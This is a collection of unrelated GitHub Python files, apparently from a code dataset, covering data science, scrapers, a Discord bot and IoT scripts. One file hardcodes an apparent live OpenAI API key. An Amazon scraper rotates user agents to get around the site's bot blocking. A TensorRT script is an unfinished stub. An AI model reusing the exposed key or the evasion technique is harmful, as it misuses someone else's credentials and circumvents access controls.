write_to_makelog(paths, error_message + '\\n\\n' + traceback.format_exc())\n raise ColoredError(error_message, traceback.format_exc())\n\ndef check_conda_status(root):\n \"\"\".. Makes sure that the repository is being run with conda and is up to date.\n\n Checks that conda is activated. \n Produces warning if it is not. \n Produces warning if setup/conda_env.yaml has been altered more recently than the .\n\n Parameters\n ----------\n root : str \n Directory of root.\n\n Returns\n -------\n None \n\n Notes\n -----\n \"\"\"\n\n python_executable = sys.executable\n\n # Check if currently in a conda env\n if 'conda' in python_executable:\n try:\n conda_info = os.path.join(root, '.conda_info')\n conda_info_new = os.path.join(root, '.conda_info_new')\n\n if os.path.exists(conda_info):\n os.system('conda list --export > %s' % conda_info_new)\n if filecmp.cmp(conda_info, conda_info_new):\n os.system('rm %s' % conda_info_new)\n else:\n os.system('rm %s' % conda_info)\n os.system('mv %s %s' % (conda_info_new, conda_info))\n\n info_time = os.path.getmtime(conda_info)\n info_time = datetime.fromtimestamp(info_time)\n\n conda_yaml = os.path.join(root, 'setup', 'conda_env.yaml')\n yaml_time = os.path.getmtime(conda_yaml)\n yaml_time = datetime.fromtimestamp(yaml_time)\n\n if yaml_time > info_time:\n print(colored(messages.warning_old_conda, 'red'))\n else:\n os.system('conda list --export > %s' % conda_info)\n except:\n error_message = 'Error with `check_conda_status`. Traceback can be found below.' \n error_message = format_message(error_message) \n raise ColoredError(error_message, traceback.format_exc())\n else:\n print(colored(messages.warning_not_conda, 'red'))\n\n__all__ = ['check_module_size', 'get_modified_sources', 'check_conda_status']\n","repo_name":"gslab-econ/gslab_make","sub_path":"gslab_make/check_repo.py","file_name":"check_repo.py","file_ext":"py","file_size_in_byte":14471,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"71492839367","text":"import openai\n\nopenai.api_key = 'Zi1YPAX8zfVUxvvYRCGFx6o1A-Nmz4Ad_-_DpF-NKPddxPKJCftXOF10tjYhpe4mxaSf4Se99LUKJG1xn73lwGA'\nopenai.api_base = 'https://api.openai.iniad.org/api/v1'\n\nquestion = input('Question?\\n')\nresponse = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"user\", \"content\": question},\n ]\n)\n\nprint(response['choices'][0]['message']['content'])","repo_name":"S1F102100490/g5team3","sub_path":"chatgpt_example.py","file_name":"chatgpt_example.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1732228384","text":"def solution(clothes):\n Hash={}\n \n # [이름, 종류]\n for name, type in clothes:\n # get() : key로 value 얻기\n # Hash[type]로 종류 개수 가져왔음\n Hash[type] = Hash.get(type,0)+1\n \n # 모든 경우의 수\n answer = 1\n for type in Hash:\n answer*=(Hash[type]+1)\n \n # 안입을 경우\n return answer-1\n \n \n # answer = 0\n # return answer","repo_name":"leedahye2001/Algorithm","sub_path":"python/hash_04.py","file_name":"hash_04.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24525335349","text":"#!/usr/bin/env python3\n\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport argparse\nimport csv\nimport json\nimport logging\nimport lxml\nimport random\nimport re\nimport requests\nimport sys\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-a\", \"--author\",\n dest=\"check_author\",\n help=\"Custom author check - [Default: all]\",\n default='all',\n action='store')\nparser.add_argument(\"-aL\", \"--author-list\",\n dest=\"author_list\",\n help=\"Custom filename for the csv file containing authors and urls - [Default: authors.csv]\",\n default='authors.csv',\n action='store')\nparser.add_argument(\"--author-file-folder\",\n dest=\"author_files_folder\",\n help=\"Custom authors file location - [Default: authors]\",\n default='authors',\n action='store')\nparser.add_argument(\"--log-level\",\n dest=\"log_level\",\n help=\"Set the level of logs to show (Options: DEBUG, INFO, WARNING, ERROR, CRITICAL) - [Default: WARNING]\",\n default='INFO',\n action='store')\nparser.add_argument(\"--test\",\n dest=\"test_run\",\n help=\"Set this to 'True' to run the script without sending the pushover message or saving the author files\",\n default=False,\n action='store')\nparser.add_argument(\"-Pu\", \"--pushover-user-token\",\n dest=\"user_token\",\n help=\"Pushover user token\",\n action='store')\nparser.add_argument(\"-Pa\", \"--pushover-api-token\",\n dest=\"api_token\",\n help=\"Pushover API token\",\n action='store')\n\nargs = parser.parse_args()\n\nif not args.test_run and not args.user_token and not args.api_token:\n parser.error(\"-Pu (--pushover-user-token) and -Pa (--pushover-api-token) are required when not doing a test run.\")\n\n\nlogging.basicConfig(format='%(asctime)s | %(levelname)s | %(message)s', level=args.log_level.upper())\n\ndef read_input_csv(author_list):\n logging.info(f\"Parsing the data from the author-list file: {author_list}\")\n with open(author_list, 'r') as file:\n reader = csv.DictReader(file)\n author_list = []\n for index, row in enumerate(reader):\n author_list.append(row)\n author_list[index]['url'] = \"https://www.amazon.com/s?k=\\\"{}\\\"&i=digital-text&s=date-desc-rank\".format(row['author'].replace(\" \",\"+\"))\n \n return author_list\n\ndef download_user_agent_list():\n ua_raw_url = \"https://gist.githubusercontent.com/pzb/b4b6f57144aea7827ae4/raw/cf847b76a142955b1410c8bcef3aabe221a63db1/user-agents.txt\"\n\n headers = ({'User-Agent':\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 SeaMonkey/2.35',\n 'Accept-Language': 'en-US, en;q=0.5'})\n raw_html = requests.get(ua_raw_url, headers=headers).text\n user_agent_list = list(raw_html.split(\"\\n\"))\n random.shuffle(user_agent_list)\n\n return user_agent_list\n\n\ndef test_amazon_request(user_agent_list):\n test_url = 'https://www.amazon.com/s?k=\"Robin+Hobb\"&i=digital-text&s=date-desc-rank'\n \n\n for user_agent in user_agent_list:\n headers = ({'User-Agent':\n f'{user_agent}',\n 'Accept-Language': 'en-US, en;q=0.5'})\n raw_html = requests.get(test_url, headers=headers).text\n bad_ua = re.search('To discuss automated access to Amazon data please contact api-services-support@amazon.com.',str(raw_html))\n\n if bad_ua:\n logging.debug(\"Fail on user agent: {}\".format(user_agent))\n else:\n logging.info(\"Success on user agent string: {}\".format(user_agent))\n return headers\n\ndef download_html(author,author_url, headers):\n logging.info(\"Start looking for need books for author: {}\".format(author))\n logging.debug(f\"Downloading the HTML code from {author_url}\")\n raw_html = requests.get(author_url, headers=headers).text\n \n return raw_html\n\ndef parse_html(author, author_html):\n books = []\n\n soup = BeautifulSoup(author_html, 'lxml')\n books_div = soup.find_all('div', {\"class\": \"sg-col sg-col-4-of-12 sg-col-8-of-16 sg-col-12-of-20 sg-col-12-of-24 s-list-col-right\"})\n images_div = soup.find_all('div', {\"class\": \"sg-col sg-col-4-of-12 sg-col-4-of-16 sg-col-4-of-20 sg-col-4-of-24 s-list-col-left\"})\n\n for index, book_div in enumerate(books_div):\n try:\n book_data_raw = book_div.find_all(string=True)\n image_data_raw = images_div[index]\n contains_author = re.search(author,str(book_data_raw))\n contains_audiobook = re.search('Audible Audiobook',str(book_data_raw))\n\n date_pattern = r\"\\b(January|February|March|April|May|June|July|August|September|October|November|December)\\s+\\d{1,2},\\s+\\d{4}\\b\"\n contains_date = re.search(date_pattern, str(book_data_raw))\n contains_now_date = re.search(\"Available instantly\",str(book_data_raw))\n\n series_pattern = r\"Book (\\d{1,3} of \\d{1,3}): (.+?)\\'\\,\"\n contains_series = re.search(series_pattern, str(book_data_raw))\n\n cover_pattern = r\"src\\=\\\"(.+?)\\\" srcset\"\n cover_link = re.search(cover_pattern, str(image_data_raw))\n cover_render_pattern = r\"(W\\/IMAGE.+images\\/)\"\n\n if contains_author and (contains_now_date or contains_date) and not contains_audiobook:\n data = {}\n data['author'] = author\n data['title'] = book_data_raw[0]\n if contains_series:\n data['series'] = contains_series.group(2)\n data['bookInSeries'] = contains_series.group(1)\n else:\n data['series'] = \"\"\n data['bookInSeries'] = \"\"\n if cover_link:\n cover_url = cover_link.group(1)\n if cover_render_pattern:\n cover_url = re.sub(cover_render_pattern,'',cover_link.group(1))\n data['coverUrl'] = cover_url\n else:\n data['coverUrl'] = \"\"\n if contains_now_date:\n data['releaseDate'] = \"Available instantly\"\n elif contains_date:\n data['releaseDate'] = contains_date.group(0)\n else:\n data['releaseDate'] = \"\"\n\n books.append(data)\n except:\n continue\n return books\n\ndef read_author_file(author_file_location):\n try:\n with open(author_file_location, 'r', encoding='utf-8') as f:\n data = json.load(f)\n except:\n data = {}\n return data\n\ndef compare_books(author, new_books, known_books):\n new_or_updated_books = []\n\n # iterate over each book in new_books\n for book in new_books:\n # create a new dictionary that only contains the relevant keys for comparison\n new_book = {k: v for k, v in book.items() if k != 'lastUpdate'}\n \n # iterate over each book in known_books and create a new dictionary that only contains the relevant keys for comparison\n known_books_titles_and_series = []\n for known_book in known_books:\n known_book_titles_and_series = {k: v for k, v in known_book.items() if k != 'lastUpdate'}\n known_books_titles_and_series.append(known_book_titles_and_series)\n \n # check if the new_book is in known_books_titles_and_series\n if new_book not in known_books_titles_and_series:\n book['lastUpdate'] = datetime.today().strftime('%Y-%m-%d')\n new_or_updated_books.append(book)\n \n if new_or_updated_books:\n message = []\n for book in new_or_updated_books:\n book = book['title'] + \" - \" + book['releaseDate']\n message.append(book)\n message = \" \\n\".join(message)\n logging.info(\"Found new or updated books for author: {} \\nBooks: {}\\n\".format(author, message))\n else:\n logging.info(\"No new books or updates found for author: {}\".format(author))\n \n return new_or_updated_books\n\ndef update_author_file(author_file_location, new_or_updated_books, known_books):\n # create a new list that contains all known books and all new or updated books\n known_books_dict = {book['title']: book for book in known_books}\n\n # Loop over the new or updated books and update the known books dict accordingly\n for book in new_or_updated_books:\n # If the book already exists in the known_books_dict, update its values\n if book['title'] in known_books_dict:\n known_books_dict[book['title']].update(book)\n # Otherwise, add the book to the known_books_dict\n else:\n known_books_dict[book['title']] = book\n\n # Convert the known_books_dict back to a list of books and sort by title\n all_books = sorted(list(known_books_dict.values()), key=lambda x: x['title'])\n\n\n with open(author_file_location, 'w+', encoding='utf-8') as f:\n json.dump(all_books, f, ensure_ascii=False, indent=4)\n\ndef send_pushover_message(author, new_or_updated_books, user_token, api_token):\n message = []\n for book in new_or_updated_books:\n book = book['title'] + \" - \" + book['releaseDate']\n message.append(book)\n message = \" \\n\".join(message)\n\n payload = {\"title\": author, \"message\": message, \"user\": user_token, \"token\": api_token }\n logging.debug(payload)\n try:\n logging.info(\"Sending pushover message\")\n requests.post('https://api.pushover.net/1/messages.json', data=payload, headers={'User-Agent': 'Python'})\n except Exception as e:\n logging.error(\"Sening pushover message failed with error: {}\".format(e))\n\n\n\ndef check_author(author,author_url,author_file_location,user_agent_list,user_token, api_token):\n \n header = test_amazon_request(user_agent_list)\n author_html = download_html(author,author_url,header) # get raw html from author recent book page -- output: raw html\n new_books = parse_html(author,author_html) # get current books -- output: dict with current book data\n known_books = read_author_file(author_file_location) # get existing book -- output: dict with known books\n new_or_updated_books = compare_books(author, new_books, known_books) # compare new and known books -- output: dict of new or updates books\n if not args.test_run:\n if new_or_updated_books: # update author file with new books -- output author file with all books and up-to-date release date\n update_author_file(author_file_location, new_or_updated_books, known_books)\n send_pushover_message(author, new_or_updated_books, user_token, api_token)\n\ndef main():\n logging.info(\"Executing the script with the following arguments: {}\".format(sys.argv[1:]))\n author = args.check_author\n author_files_folder = args.author_files_folder\n author_list = read_input_csv(args.author_list)\n\n user_agent_list=download_user_agent_list()\n\n if author == \"all\":\n for row in author_list:\n author = row[\"author\"]\n author_url = row[\"url\"]\n author_file_location = \"{}/{}.json\".format(author_files_folder,author.replace(\" \",\"_\"))\n check_author(author,author_url,author_file_location,user_agent_list,args.user_token,args.api_token)\n else:\n for row in author_list:\n found_author = False\n if row[\"author\"] == author:\n found_author = True\n author_url = row[\"url\"]\n author_file_location = \"{}/{}.json\".format(author_files_folder,author.replace(\" \",\"_\"))\n check_author(author,author_url,author_file_location,user_agent_list,args.user_token,args.api_token)\n break\n if not found_author:\n logging.error(\"Author {} not found in author list.\".format(author))\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print(\"\\nKeyboardInterrupt Detected.\")\n print(\"Exiting...\")\n exit(0)","repo_name":"jopbakker/amazonbooks_python","sub_path":"amazonbooks.py","file_name":"amazonbooks.py","file_ext":"py","file_size_in_byte":12330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10045969282","text":"#socket 모듈을 임포트\nfrom socket import *\nfrom select import select\nimport sys\nimport serial\nimport time\nimport json\n\nport='/dev/ttyUSB1' #메 뉴 > 도 구> 시리얼포 트\nbaudrate=9600\nse = serial.Serial(port,baudrate)\n\n# 호스트, 포트와 버퍼 사이즈를 지정\nHOST = '192.168.0.106'\nPORT = 56789\nBUFSIZE = 1024\nADDR = (HOST, PORT)\n\n# 소켓 객체를 만들고\nclientSocket = socket(AF_INET, SOCK_STREAM)\n\n# 서버와의 연결을 시도\ntry:\n clientSocket.connect(ADDR)\n \n\nexcept Exception as e:\n print('채팅 서버(%s:%s)에 연결 할 수 없습니다.' % ADDR)\n sys.exit()\nprint('채팅 서버(%s:%s)에 연결 되었습니다.' % ADDR)\n\n\n# 무한 루프를 시작\nwhile True:\n\ttime.sleep(1)\n\tnum = b'1'#b'1',b'2',b'3',b'4'\n\tclientSocket.send(num)\n\tdata=clientSocket.recv(BUFSIZE)\n\tprint(data.decode())\n\tse.write(data)\n\tled1 = json.loads(data.decode())[\"led1\"]\n\tled2 = json.loads(data.decode())[\"led2\"]\n\tprint(led1)\n\tprint(led2)\n\t\n\n\n","repo_name":"kyubeom21c/kosta_iot_study","sub_path":"pythonPro/test37socketClientSerial.py","file_name":"test37socketClientSerial.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32983510508","text":"#! /usr/bin/python3\n# iterate multiple time with different values of k between 2 and 10\n# each k value run 5 times\nimport sys\nimport kmean\n\nclass Args:\n def __init__(self, fn):\n self.filename = fn\n self.kval = 1\n self.summary = True\n\nif __name__ == \"__main__\":\n if (len(sys.argv) < 2):\n sys.exit('need file name')\n args = Args(sys.argv[1])\n for kval in range(2, 20):\n args.kval = kval\n for cnt in range(5):\n kmean.kmean(args)\n","repo_name":"PurdueCAM2Project/SE4ML","sub_path":"programs/unsupervised/kmean/solution/iterate.py","file_name":"iterate.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"30823445705","text":"import os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nimport input_data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\ntr_images, tr_labels = mnist.train.next_batch(60000)\n\nTRAIN_SIZE = 50000\nSHOW_PROGRESS = False\nNUMBER = 0\n\nif len(sys.argv) > 1:\n if sys.argv[1] == 'progress':\n SHOW_PROGRESS = True\n\nfig0 = plt.figure()\n\nim0 = plt.imshow(np.asmatrix(tr_images[0].reshape(28, 28)), 'pink', animated=True)\n# plt.ion()\n\n\nfor i in range(0, len(tr_images)):\n tr_images[i] = np.array(tr_images[i]) / 255\n\nimg_shape = (28, 28)\n\n\ndef relu(x):\n return np.maximum(x, 0)\n\n\nw = (2 * np.random.rand(10, 784) - 1) / 10\nb = (2 * np.random.rand(10) - 1) / 10\n\nfor n in range(len(tr_images)):\n print('Training: {}'.format(n)) if n % 10000 == 0 else None\n\n img = tr_images[n]\n cls = tr_labels[n]\n\n # forward propagation\n resp = np.zeros(10, dtype=np.float32)\n for i in range(0, 10):\n r = w[i] * img\n r = relu(np.sum(r) + b[i])\n resp[i] = r\n\n resp_cls = np.argmax(resp)\n resp = np.zeros(10, dtype=np.float32)\n resp[resp_cls] = 1.0\n\n # back propagation\n\n if isinstance(cls, int):\n true_resp = np.zeros(10)\n true_resp[cls] = 1\n else:\n true_resp = cls\n\n error = resp - true_resp\n\n delta = error * ((resp >= 0) * np.ones(10))\n for i in range(0, 10):\n w[i] -= np.dot(img, delta[i])\n b[i] -= delta[i]\n\n if SHOW_PROGRESS:\n im0.set_array(np.asmatrix(w[0].reshape(28, 28)))\n plt.pause(0.000001)\n\n\nfor i in range(10):\n filename = 'train/{}'.format(i)\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n np.savetxt(filename, w[i])\n im0.set_array(np.asmatrix(w[i].reshape(28, 28)))\n filename = 'report/imgs/{}.png'.format(i)\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n plt.savefig(filename)\n\n\nfilename = 'train/b'\nnp.savetxt(filename, b)","repo_name":"SemenovaEkaterina/neural-network","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29256948604","text":"# -*- coding: utf-8 -*-\n#####################################################################################################\n# More Details https://tensorflow.google.cn/api_docs/python/tf/experimental/tensorrt/Converter?hl=en\n#####################################################################################################\nimport os\n\nimport cv2\nimport tensorflow as tf\nimport numpy as np\n\nfrom absl import app, flags, logging\nfrom tensorflow.python.saved_model import signature_constants\nfrom tensorflow.experimental import tensorrt as trt\n\nflags.DEFINE_string('weights', None, 'path to weights file')\nflags.DEFINE_string('output', None, 'path to output')\nflags.DEFINE_integer('input_size', 416, 'path to output')\nflags.DEFINE_string('quantize_mode', 'float16', 'quantize mode (int8, float16)')\nflags.DEFINE_string('dataset', \"./coco_dataset/coco/5k.txt\", 'path to dataset')\nflags.DEFINE_integer('loop', 10, 'loop')\n\nFLAGS = flags.FLAGS\n\nfrom tensorflow.python.compiler import tensorrt\n\ndef main(_argv):\n params = tf.experimental.tensorrt.ConversionParams(\n precision_mode='FP16',\n # Set this to a large enough number so it can cache all the engines.\n maximum_cached_engines=16)\n converter = trt.Converter(\n input_saved_model_dir=\"my_dir\", conversion_params=params)\n converter.convert()\n\n # Define a generator function that yields input data, and use it to execute\n # the graph to build TRT engines.\n # With TensorRT 5.1, different engines will be built (and saved later) for\n # different input shapes to the TRTEngineOp.\n def my_input_fn():\n for _ in range(num_runs):\n inp1, inp2 = ...\n yield inp1, inp2\n\n converter.build(input_fn=my_input_fn) # Generate corresponding TRT engines\n converter.save(output_saved_model_dir) # Generated engines will be saved.\n\n\n","repo_name":"bygreencn/yolox","sub_path":"convert_trt.py","file_name":"convert_trt.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"128401771","text":"# Solved on 2022. 3. 12.\n# 10799 쇠막대기\n\nimport sys\ninput = sys.stdin.readline\n\nstring = input().strip()\ncount, res = 0, 0\nlaser = False\nfor c in string:\n if c == '(':\n count += 1\n laser = True\n else:\n count -= 1\n if laser:\n res += count\n laser = False\n else:\n res += 1\nprint(res)\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/Data_Structure/10799.py","file_name":"10799.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16908175230","text":"import discord\nfrom discord.ext import commands\nfrom datetime import datetime, timezone\nimport random as r\nfrom pytz import timezone #timezone()\nimport re\nimport requests\nfrom saucenao_api import SauceNao, VideoSauce, BookSauce\nfrom saucenao_api.errors import UnknownClientError\nimport tweepy\nfrom os import environ\n\n\n# Authenticate to Twitter\nauth = tweepy.OAuthHandler(environ.get('consumer_key'), environ.get('consumer_secret'))\nauth.set_access_token(environ.get('access_token'), environ.get('access_token_secret'))\n\n# Create API object\napi = tweepy.API(auth)\n\n# Replace the key with your own\nsauce = SauceNao(environ.get('SauceNao_key'))\nsauce2 = SauceNao(environ.get('SauceNao_key2'))\n\n\nclass Outros(commands.Cog, name=\"Diversos\"):\n \"\"\"Comandos diversos\"\"\"\n\n\n def __init__(self, client):\n self.client = client\n\n\n # !dm - sends dm to mentioned person\n @commands.command(usage=\" \", description=\"Send a DM to a member\")\n async def dm(self, ctx, member: discord.Member = None, *, message = None):\n if member and message:\n # Sending dm and deleting the message\n channel = await member.create_dm()\n await channel.send(\"**<@!{}>** from **{}:** {}\".format(ctx.message.author.id, ctx.guild.name, message))\n await ctx.message.delete()\n else:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**Sintaxe incorreta! Use !dm **\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n # Checking if arguments are valid\n @dm.error\n async def dm_error(self, ctx, error):\n if isinstance(error, commands.BadArgument):\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**Sintaxe incorreta! Use !dm **\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n\n # !hello - hello\n @commands.command(description=\"Sup\")\n async def hello(self, ctx):\n await ctx.reply(\"Yo\")\n\n\n # !random - random number between 2 numbers\n @commands.command(usage=\", \", description=\"Pick a random number from `min` to `max`\")\n async def random(self, ctx, *, numero = None):\n # Verificando se somente um número inteiro foi fornecido, aceitando espaços em branco entre ele\n if numero and re.compile('^\\s*(-?\\d+)\\s*$').search(numero):\n m = re.compile('^\\s*(-?\\d+)\\s*$').search(numero)\n n1 = int(m.group(1))\n\n if n1 <= 0:\n random_number = r.randint(n1, 0)\n else:\n random_number = r.randint(0, n1)\n\n await ctx.reply(random_number)\n # Verificando se há dois números inteiros separados por uma vírgula, aceitando espaços em branco entre as palavras\n elif numero and re.compile('^\\s*(-?\\d+)\\s*,\\s*(-?\\d+)\\s*$').search(numero):\n m = re.compile('^\\s*(-?\\d+)\\s*,\\s*(-?\\d+)\\s*$').search(numero)\n n1 = int(m.group(1))\n n2 = int(m.group(2))\n \n if n1 <= n2:\n random_number = r.randint(n1, n2)\n else:\n random_number = r.randint(n2, n1)\n\n await ctx.reply(random_number)\n else:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**Sintaxe incorreta! Use !random , **\"\n )\n \n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n\n # !junior - display junior's pic\n @commands.command(description=\"Junior zuado\")\n async def junior(self, ctx):\n embed = discord.Embed(\n color = discord.Color.gold(),\n timestamp = datetime.utcnow()\n )\n\n embed.set_image(url='https://image.prntscr.com/image/BemzF5RlTxa8Tdog35W5Aw.jpg')\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n message = await ctx.reply(embed=embed)\n await message.add_reaction('<:PepeWTF:720074659294478377>')\n\n\n # !now - now\n @commands.command(description=\"Display current datetime\")\n async def now(self, ctx):\n \"\"\" Auto detect timezone (working example 1) datetime.timezone \"\"\"\n # local_now = datetime.now(timezone.utc).astimezone()\n # await ctx.reply(local_now.strftime(\"%a, %b %d %Y %X %Z\"))\n \"\"\" Working example 2 (EST gmt -5) timezone.pytz \"\"\"\n # now_utc = datetime.now(timezone('UTC')).astimezone(timezone('EST'))\n # await ctx.reply(now_utc.strftime(\"%a, %b %d %Y %X %Z\"))\n\n # utc verification and stuff, you can change America/Sao_Paulo to another timezone See: https://gist.github.com/heyalexej/8bf688fd67d7199be4a1682b3eec7568\n local_now = datetime.now(timezone('UTC')).astimezone(timezone('America/Sao_Paulo'))\n if local_now.strftime(\"%Z\")[1] == '0':\n if len(local_now.strftime(\"%Z\")) != 3:\n utc = local_now.strftime(\"%Z\")[0] + local_now.strftime(\"%Z\")[2] + \":\" + local_now.strftime(\"%Z\")[3:]\n await ctx.reply(local_now.strftime(\"Today is %d/%m/%Y (%A), **%X (UTC{})**\").format(utc))\n else:\n utc = local_now.strftime(\"%Z\")[0] + local_now.strftime(\"%Z\")[2:]\n await ctx.reply(local_now.strftime(\"Today is %d/%m/%Y (%A), **%X (UTC{})**\").format(utc))\n elif local_now.strftime(\"%Z\").isalpha():\n await ctx.reply(local_now.strftime(\"Today is %d/%m/%Y (%A), **%X %Z**\"))\n elif local_now.strftime(\"%Z\")[1] != '0':\n if len(local_now.strftime(\"%Z\")) != 3:\n utc = local_now.strftime(\"%Z\")[:3] + \":\" + local_now.strftime(\"%Z\")[3:]\n await ctx.reply(local_now.strftime(\"Today is %d/%m/%Y (%A), **%X (UTC{})**\").format(utc))\n else:\n await ctx.reply(local_now.strftime(\"Today is %d/%m/%Y (%A), **%X (UTC%Z)**\"))\n\n \n # Method that is going to search for sauce\n async def search_sauce(self, ctx, url):\n # If url is from Twitter\n if re.compile('^https?:\\/\\/twitter\\.com\\/(?:#!\\/)?(\\w+)\\/status(es)?\\/(\\d+)').search(url):\n # Getting tweet id \n id = re.search('/status/(\\d+)', url).group(1)\n status = api.get_status(id, tweet_mode='extended')\n\n # If an image/video is included on the tweet\n if 'media' in status.entities:\n # Getting only first image\n url_twitter = status.extended_entities['media'][0]['media_url_https']\n\n # Results\n try:\n try:\n results = sauce.from_url(url_twitter)\n except:\n results = sauce2.from_url(url_twitter)\n except Exception as error:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**{}**\".format(error)\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n # return to stop the execution of the method\n return\n # No media\n else:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**There is nothing to search for!**\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n # return to stop the execution of the method\n return\n # Other links\n else:\n # Trying to find the source\n # Results\n try:\n try:\n results = sauce.from_url(url)\n except:\n results = sauce2.from_url(url)\n # No media perhaps\n except UnknownClientError as error:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**There is nothing to search for!**\"\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n # return to stop the execution of the method\n return\n except Exception as error:\n embed = discord.Embed(\n color = discord.Color(0xff0000),\n timestamp = datetime.utcnow(),\n description = \"**{}**\".format(error)\n )\n\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await ctx.reply(embed=embed)\n\n # return to stop the execution of the method\n return\n\n # Getting the source with highest similarity\n best = results[0]\n\n # Embed\n embed = discord.Embed(\n color = discord.Color(0xffc338),\n timestamp = datetime.utcnow(),\n title = best.title\n )\n\n # Similarity\n embed.add_field(name=\"Similarity\".format(), value=\"{}%\".format(best.similarity), inline=True)\n\n # Author\n if best.author:\n embed.add_field(name=\"Author\".format(), value=\"{}\".format(best.author), inline=True)\n else:\n embed.add_field(name=\"Author\".format(), value=\"–\", inline=True)\n\n # Material\n if 'material' in best.raw['data']:\n if best.raw['data']['material']:\n embed.add_field(name=\"Material\", value=\"{}\".format(best.raw['data']['material']), inline=False)\n\n # Characters\n if 'characters' in best.raw['data']:\n if best.raw['data']['characters']:\n embed.add_field(name=\"Characters\", value=\"{}\".format(best.raw['data']['characters']), inline=False)\n\n # If source is from an anime\n if isinstance(best, VideoSauce):\n # Part/episode\n if 'part' in best.raw['data']:\n if best.raw['data']['part']:\n embed.add_field(name=\"Episode\", value=\"{}\".format(best.raw['data']['part']), inline=False)\n # Year\n if 'year' in best.raw['data']:\n if best.raw['data']['year']:\n embed.add_field(name=\"Year\", value=\"{}\".format(best.raw['data']['year']), inline=False)\n # Estimated time\n if 'est_time' in best.raw['data']:\n if best.raw['data']['est_time']:\n embed.add_field(name=\"Est Time\", value=\"{}\".format(best.raw['data']['est_time']), inline=False)\n # If source is from a book\n elif isinstance(best, BookSauce):\n # Part/volume\n if 'part' in best.raw['data']:\n if best.raw['data']['part']:\n embed.add_field(name=\"Part\", value=\"{}\".format(best.raw['data']['part']), inline=False) \n\n # Source\n if 'source' in best.raw['data']:\n if best.raw['data']['source']:\n # Pixiv link because https://i.pximg.net is 'broken'\n if re.compile('^https:\\/\\/i\\.pximg\\.net').search(best.raw['data']['source']):\n embed.add_field(name=\"Source\", value='https://www.pixiv.net/en/artworks/' + best.raw['data']['source'].split('/')[-1], inline=False)\n # Other links\n else:\n embed.add_field(name=\"Source\", value=best.raw['data']['source'], inline=False)\n\n # Links\n for count, link in enumerate(best.urls, start=1):\n embed.add_field(name=\"Link {}\".format(count), value=\"{}\".format(link), inline=False)\n\n # Thumbnail\n embed.set_thumbnail(url='{}'.format(best.thumbnail))\n embed.set_footer(icon_url='{}'.format(ctx.message.author.avatar_url_as(format=None, static_format='png')).split(\"?\")[0], text=\"Gerado por {0}\".format(ctx.message.author.name))\n await 